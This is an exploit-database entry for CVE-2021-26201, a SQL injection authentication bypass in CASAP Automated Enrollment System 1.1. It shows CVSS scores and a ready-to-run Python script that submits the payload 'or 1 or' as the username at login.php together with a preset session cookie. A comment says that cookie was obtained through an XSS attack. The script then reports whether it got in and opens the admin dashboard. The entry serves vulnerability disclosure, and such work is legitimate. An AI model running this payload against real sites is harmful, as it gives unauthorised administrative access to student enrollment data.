Lucene search

K
zdtZdt1337DAY-ID-35889
HistoryMar 02, 2021 - 12:00 a.m.

CASAP Automated Enrollment System 1.1 SQL Injection Exploit

2021-03-0200:00:00
0day.today
25

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

# Exploit Title: CASAP Automated Enrollment System 1.1 - Authentication Bypass cookie session
# Exploit Author: @nu11secur1ty
# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip
# Version: 1.1
# Tested On: Ubuntu + XAMPP 7.3.2
# Description: CASAP Automated Enrollment System 1.0 - Authentication
Bypass SQLi cookie session
# Exploit Link:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26201
# More: https://www.nu11secur1ty.com/2021/03/cve-2021-26201.html

[Exploit]


import time
import sys
import requests
import webbrowser

# Creator of the idea: Himanshu Shukla
print("Author: @nu11secur1ty")

def authbypass(url):

  #Authentication Bypass
  s = requests.Session()
  #Set Cookie fot testing
  #PHPSESSID=3g6ghfl8i7qh190m4pq92fv262 #in my case from XSS attack
  cookies = {'PHPSESSID': 'inucrnag25j9h5hb826kovir0p'}

  print ("[*]Attempting Authentication Bypass cookie session...")
  time.sleep(1)

  values = {"username":"'or 1 or'","password":""}
  r=s.post(url+'login.php', data=values, cookies=cookies)
  p=s.get(url+'dashboard.php', cookies=cookies)

  #Check if Authentication was bypassed or not.
  logged_in = True if ("true_admin" in r.text) else False
  l=logged_in
  if l:
    print("[+]Authentication Bypass Successful...!")
  else:
    print("[-]Failed cookie Authentication exploit!")
    print("[-]Check Your URL")

if __name__ == "__main__":
  
  if len(sys.argv)!=2:
    print("You Haven't Provided any URL!")
    print("Usage : python3 exploit.py <URL>")
    print("Example : python3 exploit.py http://IP_or_domain/final/")
    exit()
  try:
    authbypass(sys.argv[1])
    webbrowser.open('http://10.10.10.100/final/dashboard.php')
  except:

    print("[-]Invalid URL!")
    exit()

# BR @nu11secur1ty

#  0day.today [2021-09-14]  #

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P